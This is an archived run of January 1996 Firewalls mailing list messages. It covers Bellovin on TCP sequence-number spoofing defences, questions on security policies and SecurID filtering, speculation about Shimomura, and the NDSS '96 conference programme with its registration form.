-0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA18203; Wed, 10 Jan 1996 09:20:39 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA17136; Wed, 10 Jan 1996 09:20:38 +0100 Date: Wed, 10 Jan 1996 09:20:38 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Security managing Cisco Routers To: David Kovar Cc: Bill Husler , Firewalls@GreatCircle.COM In-Reply-To: <199512290850.DAA16307@nda.nda.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 15:27:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA07751 for firewalls-outgoing; Wed, 10 Jan 1996 12:18:52 -0800 (PST) Received: from ufrmsa1.Olivetti.za (ufrmsa1.Olivetti.za [160.124.2.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA07746 for ; Wed, 10 Jan 1996 12:18:35 -0800 (PST) Received: from andy by ufrmsa1.Olivetti.za with uucp (Smail3.1.29.1 #3) id m0ta6xf-000IaXC; Wed, 10 Jan 96 22:17 GMT+0200 Date: Wed, 10 Jan 1996 22:11:15 +0200 (GMT+0200) From: Andrew Cameron To: firewalls@greatcircle.com Subject: Internet Policy/Security Policy Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to know where I can find examples of an Internet/Security Policy for a company. I will need to write one in the near future and would like to draw on the experiance of others. Thanks in anticipation ----------------------------------------------------------------------------- Andrew Cameron Internet : andrew@andy.alt.za X.400 : C=ZA G=Andrew S=Cameron Admd=TELKOM400 ---------------------------------------------------------------------------- From firewalls-owner Wed Jan 10 15:31:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA10659 for firewalls-outgoing; Wed, 10 Jan 1996 14:03:31 -0800 (PST) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA10654 for ; Wed, 10 Jan 1996 14:03:27 -0800 (PST) From: smb@research.att.com Received: from research.att.com by relay3.UU.NET with SMTP id QQzxyu25690; Wed, 10 Jan 1996 17:02:29 -0500 (EST) Message-Id: Received: from research.att.com by ns; Wed Jan 10 17:01:59 EST 1996 Received: from gryphon by research; Wed Jan 10 16:59:32 EST 1996 Received: by gryphon; Wed Jan 10 16:59:26 EST 1996 To: Firewalls@GreatCircle.COM cc: Brain21 Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Date: Wed, 10 Jan 96 16:59:25 EST Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to know this... if Shimomura is so good (an I actually believe that he may be) then why did he leave the r-utils enabled? Why did he not use TCPWrappers to prevent spoofing? Why did he allow people to see inside his network (Mitnick saw that there was a machine "X-something" that he believed was trusted by Shimomura's machine)? I mean, I believe that Shimomura knew of the possibility of this type of attack WAY ahead of time (like months or years). Why no encryption to stop this type of attack? Why did he not use random sequence numbers? TCP wrappers don't defend against sequence number guessing attacks. The essence of the attack is that the bad guy is using an IP address that you trust -- and it doesn't matter if it's check by rshd or the TCPwrapper; if it's fraudulent, it's fraudulent. It's harder than you might think to hide the existence of trusted machines, unless you're using an application or circuit firewall. Random sequence numbers break other things about TCP; see Appendix A to RFC 1185. For that matter, see my 1989 paper -- it's the best-known early description of the attack (and yes, Tsutomu did know of my paper; we discussed various generalizations of it in 1991 and 1992). Encryption, or cryptographic authentication a la Kerberos, would have done the trick. But a lot of people, including me, had doubts about whether or not the attack practical across a WAN. Obviously, we were wrong, and the reason we were wrong is that we didn't remember the exact gagging attack that Morris described in his 1985 tech report in which he reported the invention of this attack. A couple of months ago, I did come up with a strong but simple defense against sequence number attacks. For details, see ftp://ds.internic.net/internet-drafts/draft-rfced-info-bellovin-00.txt --Steve Bellovin From firewalls-owner Wed Jan 10 15:38:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02616 for firewalls-outgoing; Wed, 10 Jan 1996 10:46:42 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08638 for ; Wed, 10 Jan 1996 00:19:51 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA17428; Wed, 10 Jan 1996 09:20:35 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA15335; Wed, 10 Jan 1996 09:20:35 +0100 Date: Wed, 10 Jan 1996 09:20:35 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: question To: Rob Deker Cc: firewalls@greatcircle.com In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 15:41:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02378 for firewalls-outgoing; Wed, 10 Jan 1996 10:37:50 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08686 for ; Wed, 10 Jan 1996 00:20:31 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA06458; Wed, 10 Jan 1996 09:20:58 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA18196; Wed, 10 Jan 1996 09:20:57 +0100 Date: Wed, 10 Jan 1996 09:20:57 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Holes in SunOS sendmail -Reading Root Mail To: Mike Culver Cc: firewalls@greatcircle.com In-Reply-To: <9512281459.AA28045@ncelec.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 15:45:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02421 for firewalls-outgoing; Wed, 10 Jan 1996 10:40:42 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08640 for ; Wed, 10 Jan 1996 00:19:52 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA23566; Wed, 10 Jan 1996 09:20:33 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA19425; Wed, 10 Jan 1996 09:20:33 +0100 Date: Wed, 10 Jan 1996 09:20:32 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Dawg GOT rootkit for Christmas To: Sick Puppy Cc: firewalls@greatcircle.com In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 15:48:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02406 for firewalls-outgoing; Wed, 10 Jan 1996 10:40:28 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08606 for ; Wed, 10 Jan 1996 00:19:22 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA25796; Wed, 10 Jan 1996 09:20:00 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA18835; Wed, 10 Jan 1996 09:19:59 +0100 Date: Wed, 10 Jan 1996 09:19:59 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: FreeBSD as a firewall To: "KOHLS, KERSTEN" Cc: firewalls@greatcircle.com In-Reply-To: <9600028206.AA820620752@mail.cleveland.dfas.mil> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 15:52:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02353 for firewalls-outgoing; Wed, 10 Jan 1996 10:34:54 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08586 for ; Wed, 10 Jan 1996 00:19:09 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA22251; Wed, 10 Jan 1996 09:20:08 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA17319; Wed, 10 Jan 1996 09:20:07 +0100 Date: Wed, 10 Jan 1996 09:20:07 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: ipx-bridging & ip-routing To: Pablo Cc: firewalls@greatcircle.com In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 15:55:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02597 for firewalls-outgoing; Wed, 10 Jan 1996 10:45:23 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08633 for ; Wed, 10 Jan 1996 00:19:40 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA08689; Wed, 10 Jan 1996 09:20:12 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA13757; Wed, 10 Jan 1996 09:20:12 +0100 Date: Wed, 10 Jan 1996 09:20:12 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Source Routing and Disabling To: Ray Hooker Cc: "'Firewall Mailing List'" In-Reply-To: <01BAD90A.16831660@async61.async.duke.edu> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 15:59:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA12524 for firewalls-outgoing; Wed, 10 Jan 1996 15:08:32 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA04486 for ; Wed, 10 Jan 1996 11:27:21 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id GAA24431; Wed, 10 Jan 1996 06:26:30 -0800 Received: from uustar.starnet.net(199.217.253.12) by mycroft via smap (V1.3mjr) id sma024429; Wed Jan 10 06:25:44 1996 Received: from hq.UUCP by uustar.starnet.net with UUCP id AA28529 (5.67b/IDA-1.5 for greatcircle.com!firewalls); Wed, 10 Jan 1996 08:16:49 -0600 Received: (from daemon@localhost) by hq.agedwards.com (8.6.9/8.6.9) id IAA04519 for firewalls@greatcircle.com.outbound; Wed, 10 Jan 1996 08:03:02 -0600 Received: from igate.agedwards.com (igate.agedwards.com [159.45.56.11]) by hq.agedwards.com (8.6.9/8.6.9) with ESMTP id IAA04515 for ; Wed, 10 Jan 1996 08:03:00 -0600 Received: from Microsoft Mail (PU Serial #1093) by igate.agedwards.com (PostalUnion/SMTP(tm) v2.1.8c for Windows NT(tm)) id AA-1996Jan10.075400.1093.22480; Wed, 10 Jan 1996 08:00:29 -0600 From: nicholscs@agedwards.com (Nichols,Christopher) To: firewalls@greatcircle.com ('SMTP: firewalls@greatcircle.com') Message-Id: <1996Jan10.075400.1093.22480@igate.agedwards.com> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: A.G. Edwards & Sons Inc. St. Louis Date: Wed, 10 Jan 1996 08:00:29 -0600 Subject: SecureID Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am investigating the use of Security Dynamics ACE Servers and SecurID tokens and have a question concerning packet filtering and the passing of the SDI packets through our net. Given the design: A (Cisco)-----External Segment-----B(HP Box)----------C(Cisco)----------D(Internal Net) A - external router and authentication point B - HP Box where App for users on external segment resides (routing is off) C - Screening Filter/Firewall D - Internal Net where ACE Server would reside Since the design may exist in muliple sites, we plan to use strong filtering between the HP box (B) and the Internal Net (D). We are also considering a commercial firewall at C. My understanding is that the SDI authentication process uses dynamically assigned port numbers (udp) > 1024. That would require us to open all ports > 1024 at point C so that SDI could pass from A to D. This is not desirable. 1) With routing off at B does anyone know of an existing proxy to pass the SDI packets across from A to C? or has anyone written one? 2) How can we setup an effective firewall at C without having to open all ports > 1024 and still allow the SDI authentication process to pass? One suggestion was to use TACACS. Any thoughts? Chris From firewalls-owner Wed Jan 10 16:02:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA12906 for firewalls-outgoing; Wed, 10 Jan 1996 15:17:38 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA12895 for ; Wed, 10 Jan 1996 15:17:03 -0800 (PST) Received: from x-wb-ngm-mime.cinops.xerox.com ([13.250.20.31]) by alpha.xerox.com with SMTP id <14729(6)>; Wed, 10 Jan 1996 15:15:33 PST X-Nvlenv-01Date-Transferred: 10-Jan-1996 15:38:47 -0500; at X-MC-AREA-HUB.xerox X-Nvlenv-01Date-Transferred: 10-Jan-1996 15:42:56 -0500; at X-WB-NGM-MIME.XEROX X-Nvlenv-01Date-Posted: 10-Jan-1996 15:42:41 -0500; at x-mc-xrx2-ms3.xerox Date: Wed, 10 Jan 1996 12:39:33 PST From: Scott_Rickard@mc.xerox.com (Rickard,Scott) To: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG Message-Id: <"<7124F430819C2976>7124F430819C2976@x-mc-xrx2-ms3.xerox"@-SMF-> Cc: brain21@montag33.residence.gatech.edu, jya@pipeline.com (John Young), frankw@in.net (Frank Willoughby) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Date: Tuesday, January 09, 1996 9:56PM Brain21 writes: >I would like to know this... if Shimomura is so good (an I actually >believe that he may be) then why did he leave the r-utils enabled? Why >did he not use TCPWrappers to prevent spoofing? Why did he allow people >to see inside his network (Mitnick saw that there was a machine >"X-something" that he believed was trusted by Shimomura's machine)? Snip >Just wondering why... The answer is quite clear if you have spook world experience and identify with several key elements quoted in Frank Willoughby's re-post of the Cypherpunks mailing list message regarding extracts from Jonathan Littman's book "The Fugitive Game: Online With Kevin Mitnick," In the extracts, Markoff mentions the issue of a bait machine and the possibility of Shimomura being closely affiliated with the DOD, NSA and other intelligence organizations. Shimomura is completely involved in the intelligence business and he definitely knows how to catch mice for rewards from the world's largest feline, the NSA. The NSA and other intelligence organizations go to great lengths to gather, analyze, correlate and confirm a tremendous amount of information. The NSA and other intelligence organizations attempt to influence perception by both publicly and privately publishing information or shrewdly allowing some type of "inadvertent mouse trap" access. In the extracts, Markoff also indicates that people live in "a wilderness-of-mirrors kind of world," with respect to the colossal intelligence and counterintelligence business that historians will eventually call the ninth wonder of the world. Globally, the intelligence and counterintelligence businesses are a multi-trillion dollar industry that thrives on information gathering, analysis and dissemination strategies. In the name of unusual essences of national security, honor, pride, greed or any combination of these components, generous numbers of international organizations exchange information between genuine and spurious alliances to cleverly buy, sell and release anticipated beneficial perception. As for the bigger question of why, humans will always contemplate, attempt and tolerate the conquering of others as long as they continue to want more. For a quick look at the tip of the complex intelligence iceberg, check out a copy of Codebusters, The Puzzle Palace, and War and Peace. Scott Rickard Senior IT Engineering Consultant Scott_Rickard@mc.xerox.com From firewalls-owner Wed Jan 10 16:11:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA12607 for firewalls-outgoing; Wed, 10 Jan 1996 15:10:50 -0800 (PST) Received: from relay.tis.com (relay.tis.com [192.94.214.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA11241 for ; Wed, 10 Jan 1996 14:41:06 -0800 (PST) Received: by relay.tis.com; id MAA26253; Wed, 10 Jan 1996 12:46:04 -0500 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0.3) id xma026246; Wed, 10 Jan 96 12:45:54 -0500 Received: from sol.tis.com by tis.com (4.1/SUN-5.64) id AA11229; Wed, 10 Jan 96 17:38:00 EST Message-Id: <9601102238.AA11229@tis.com> To: firewalls@greatcircle.com Subject: Program Announcement - ISOC 1996 Symp. Netw. & Distr. Sys. Security Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Id: <11217.821313477.1@tis.com> Date: Wed, 10 Jan 1996 17:37:59 -0500 From: "David M. Balenson" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------------------------------------------------------------------------ THE INTERNET SOCIETY 1996 SYMPOSIUM ON NETWORK AND DISTRIBUTED SYSTEM SECURITY (NDSS '96) 22-23 FEBRUARY 1996 SAN DIEGO PRINCESS RESORT, SAN DIEGO, CALIFORNIA The symposium will bring together people who are building software and/or hardware to provide network and distributed system security services. The symposium is intended for those interested in the more practical aspects of network and distributed system security, focusing on actual system design and implementation, rather than in theory. We hope to foster the exchange of technical information that will encourage and enable the Internet community to apply, deploy and advance the state of the available security technology. ------------------------------------------------------------------------------ P R E L I M I N A R Y P R O G R A M WEDNESDAY, FEBRUARY 21 6:00 P.M. - 8:00 P.M. RECEPTION - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - THURSDAY, FEBRUARY 22 7:30 A.M. CONTINENTAL BREAKFAST 8:30 A.M. OPENING REMARKS 9:00 A.M. SESSION 1: ELECTRONIC MAIL SECURITY Chair: Stephen T. Kent (BBN Corporation, USA) Mixing E-mail with BABEL, Gene Tsudik and Ceki Gulcu (IBM Research Division, Zurich Research Laboratory, SWITZERLAND) An Integration of PGP and MIME, Kazuhiko Yamamoto (Nara Institute of Science and Technology, JAPAN) 10:00 A.M. BREAK 10:30 A.M. SESSION 2: DISTRIBUTED OBJECT SYSTEMS Chair: Dan Nessett (Sun Microsystems, USA) A Security Framework Supporting Domain Based Access Control in Distributed Systems, Nicholas Yialelis and Morris Sloman (Imperial College, London, UNITED KINGDOM) PANEL: Scalability of Security in Distributed Object Systems Chair: Dan Nessett (Sun Microsystems, USA) Panelists: Dan Nessett (Sun Microsystems, USA), Nicholas Yialelis (Imperial College, London, UNITED KINGDOM), and Bret Hartman (Odyssey Research Associates, USA) 12:00 NOON LUNCH 1:30 P.M. SESSION 3: DISTRIBUTED SYSTEM SECURITY Chair: Michael Roe (University of Cambridge, UNITED KINGDOM) A Flexible Distributed Authorization Protocol, Jonathan Trostle (CyberSAFE, USA) and B. Clifford Neuman (Information Sciences Institute, University of Southern California, USA) Preserving Integrity in Remote File Location and Retrieval, Trent Jaeger (University of Michigan, USA) and Aviel D. Rubin (Bellcore, USA) C-HTTP - The Development of a Secure, Closed HTTP-Based Network on the Internet, Takahiro Kiuchi (University of Tokyo, JAPAN) and Shigekoto Kaihara (University of Tokyo Hospital, JAPAN) 3:00 P.M. BREAK 3:30 P.M. SESSION 4: PANEL: INTELLECTUAL PROPERTY PROTECTION Chair: Peter Neumann (SRI International, USA) Panelists: David Bernstein (Electronic Publishing Resources, USA), Russ Housley (Spyrus, USA), and Dan Boneh (Princeton University, USA) 7:00 P.M. DINNER BANQUET - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - FRIDAY, FEBRUARY 23 7:30 A.M. CONTINENTAL BREAKFAST 8:30 A.M. SESSION 5: NETWORK SECURITY Chair: Matt Bishop (University of California at Davis, USA) Designing an Academic Firewall: Policy, Practice and Experience with SURF, Michael B. Greenwald, Sandeep K. Singhal, Jonathan R. Stone, and David R. Cheriton (Stanford University, USA) Digital Signature Protection of the OSPF Routing Protocol, Sandra Murphy and Madelyn Badger (Trusted Information Systems, USA) A Case Study of Secure ATM Switch Booting, Shaw-Cheng Chuang and Michael Roe (University of Cambridge, UNITED KINGDOM) 10:00 A.M. BREAK 10:30 A.M. SESSION 6: KEY MANAGEMENT Chair: Burt Kaliski (RSA Laboratories, USA) SKEME: A Versatile Secure Key Exchange Mechanism for Internet, Hugo Krawczyk (IBM T.J. Watson Research Center, USA) IDUP and SPKM: Developing Public-Key-Based APIs and Mechanisms for Communication Security Services, Carlisle Adams (Bell-Northern Research, CANADA) 11:30 A.M. LUNCH 1:00 P.M. SESSION 7: ENCRYPTION Chair: Paul Lambert (Oracle, USA) An Empirical Study of Secure MPEG Video Transmissions, Iskender Agi and Li Gong (SRI International, USA) Parallelized Network Security Protocols, Erich Nahum and David J. Yates (University of Massachusetts, USA), Sean O'Malley, Hilarie Orman and Richard Schroeppel (University of Arizona, USA) A "Bump in the Stack" Encryptor for MS-DOS Systems, David A. Wagner (University of California at Berkeley, USA) and Steven M. Bellovin (AT&T Bell Laboratories, USA) 2:30 P.M. BREAK 3:00 P.M. SESSION 8: PANEL: PUBLIC-KEY INFRASTRUCTURE Chair: Warwick Ford (Bell Northern Research, CANADA) Panelists: John Wankmueller (MasterCard International, USA), Taher ElGamal (Netscape Communications, USA), and Michael Baum (VeriSign, USA). ------------------------------------------------------------------------------ GENERAL CHAIR: Jim Ellis, CERT Coordination Center PROGRAM CHAIRS: David Balenson, Trusted Information Systems B. Clifford Neuman, USC Information Sciences Institute PROGRAM COMMITTEE: Tom Berson, Anagram Laboratories Matt Bishop, University of California at Davis Doug Engert, Argonne National Laboratory Warwick Ford, Bell Northern Research (Canada) Burt Kaliski, RSA Laboratories Steve Kent, BBN Corporation Paul Lambert, Oracle John Linn, OpenVision Technologies Teresa Lunt, Advanced Research Projects Agency Dan Nessett, Sun Microsystems Hilarie Orman, University of Arizona Michael Roe, Cambridge University (UK) Rob Rosenthal, U.S. National Institute of Standards and Technology Avi Rubin, Bellcore Jeff Schiller, Massachusetts Institute of Technology Rob Shirey, BBN Corporation Doug Tygar, Carnegie Mellon University Roberto Zamparo, Telia Research (Sweden) LOCAL ARRANGEMENTS CHAIR: Thomas Hutton, San Diego Supercomputer Center PUBLICATIONS CHAIR: Steve Welke, Institute for Defense Analyses REGISTRATIONS CHAIR: Donna Leggett, Internet Society STEERING GROUP Internet Research Task Force, Privacy and Security Research Group ------------------------------------------------------------------------------ BEAUTIFUL SAN DIEGO PRINCESS RESORT Location The Symposium venue is the San Diego Princess Resort, a tropical paradise on a forty-four acre island in Mission Bay, ten minutes from the international airport. Lush gardens landscaped with hundreds of species of tropical and subtropical plants are always ablaze with color and perfect for themed group events. Charming pathways wander among sparkling waterfalls, across quaint footbridges and sleepy lagoons filled with water lilies and waterfowl. A white sand beach curves around the island for over a mile, and the award-winning grounds encompass five swimming pools and six lighted tennis courts. Spouses and family members can catch a convenient Harbor Hopper for a quick trip to Sea World. After the Symposium, plan to spend the weekend visiting La Jolla, the world famous San Diego Zoo or Mexico, only 30 minutes by car or Trolley. Housing Information We have reserved a special block of sleeping rooms at the San Diego Princess Resort at the following rates: Lanai Patio & Garden View Rooms $ 81* Lanai Garden & Lagoon View Rooms $112 One Bedroom Suite $115 * This represents the Government Rate for San Diego. We have a limited number of rooms available at this rate. If you need a government rate, reserve your room early! You must present a valid government id upon check- in. Based on room type and space availability, these special group rates are applicable two days prior to and two days after the symposium. Current Room Tax is 10.5%. Check-in availability cannot be committed prior to 4:00 p.m. Check-out time is 12:00 noon. The San Diego Princess Resort will make every effort to accommodate any early arrivals, so make sure you give them your arrival time when you make your reservation. To make a reservation Contact the San Diego Princess Resort at 1-800-344-2626 (+1-619-274-4630 if outside the United States). To receive the special group rates, reservations must be made no later than January 20, 1996. CLIMATE February weather in San Diego is normally very pleasant. Early morning temperatures average 55 degrees while afternoon temperatures average 67 degrees. Generally, a light jacket or sweater is adequate during February; although, occasionally it rains. REGISTRATION FEES ISOC Non- Members Member Early registration (postmarked by Jan. 19) $295 $330 Late registration $365 $400 REGISTRATION INCLUDES - Attendance - Symposium Proceedings - Two luncheons - Reception - Banquet - Coffee Breaks FOR MORE INFORMATION on registration contact Donna Leggett by phone at 703-648-9888 or via e-mail to Ndss96reg@isoc.org. WEB PAGE - Additional information about the symposium and San Diego, as well as an on-line registration form, are available via the Web at: http://www.isoc.org/conferences/ndss96 ------------------------------------------------------------------------------ Internet Society Symposium on Network and Distributed System Security 22-23 February, 1996 San Diego, California, USA Registration Form --------------------------------------------------------------------------- Fill out this form and FAX it to NDSS'96 Registration (703) 648-9887, send it via electronic mail to Ndss96reg@isoc.org, or mail it to NDSS96, 12020 Sunrise Valley Drive, Suite 210, Reston, VA, 22091, USA --------------------------------------------------------------------------- Personal Information __Mr __Ms __Mrs __Dr __Prof __M __Prof Dr __Dip Ing __Ing __Miss __Mlle First Name: __________________________ Middle Name: _______________ Family Name: __________________________ __sr __jr __II __III __PhD Please enter your name as you would like it to appear on your conference name tag. Badge Name: _____________________________ Contact Information Your title: _____________________________ Your affiliation: _____________________________ Your address: _____________________________ _____________________________ City: _____________________________ State or Province: _____________________________ Postal Code: _____________ Country: _____________________________ Tel (work) Number: _____________________________ Tel (home) Number: _____________________________ Fax Number: _____________________________ EMail address: _____________________________ Special Needs? Do you have any special needs (vegetarian meals, wheelchair access, etc?): _________________________________________________________________________ _________________________________________________________________________ Appear on the Registrants List? ___ Please check here if you would NOT like your name included in the list of registrants. Payment Information All Payments must be in United States Dollars. Conference Charges If you are an Internet Society member, you are eligible for a reduced registration fee. Non-member symposium attendees will receive a one year Internet Society membership as part of the non-member registration fees. Check one: Before After January 19 January 19 ---------- ---------- ___Internet Society Member Conference Fee US$ 295.00 US$ 365.00 ___Non-Member Conference Fee US$ 330.00 US$ 400.00 Method of Payment 1. __ Check Make payable to the Internet Society. Checks must be postmarked before February 16, 1996 or you will not be registered. 2. __ Credit Card __ American Expres __ Mastercard __ Visa Name on Credit Card:__________________________ Credit Card Number:__________________________ Expiration Date:__________ 3. __ First Virtual First Virtual Account Number: _________________________ 4. __ Wire Transfer* Riggs Bank of Virginia Bank ABA number: 056001260 8315 Lee Highway Account number: Internet Society 148 387 10 Fairfax VA 22031 USA Wire Transfer Confirmation Number:____________________________ * Please process wire transfer before sending the registration form. 5. __ U.S. Government Purchase order* Please provide the P.O. Number: ___________________________ * Please fax or mail a copy of your purchase order along with your registration form. Cancellation Policy ------------------- Refunds will be issued for cancellations received before February 16, 1996. No refunds will be issued after February 16, 1996. --------------------------------------------------------------------------- From firewalls-owner Wed Jan 10 16:26:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02604 for firewalls-outgoing; Wed, 10 Jan 1996 10:45:47 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08661 for ; Wed, 10 Jan 1996 00:19:59 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA31793; Wed, 10 Jan 1996 09:20:52 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA14859; Wed, 10 Jan 1996 09:20:51 +0100 Date: Wed, 10 Jan 1996 09:20:51 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Reliability of TCP/IP.. To: Darren Reed Cc: Firewalls Mailing List In-Reply-To: <199512291035.CAA05753@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 17:13:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA16299 for firewalls-outgoing; Wed, 10 Jan 1996 16:47:27 -0800 (PST) Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA16294 for ; Wed, 10 Jan 1996 16:47:22 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id SAA24642; Wed, 10 Jan 1996 18:46:20 -0600 Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id SAA18848; Wed, 10 Jan 1996 18:47:28 -0600 Posted-Date: Wed, 10 Jan 1996 18:47:28 -0600 Date: Wed, 10 Jan 1996 18:47:28 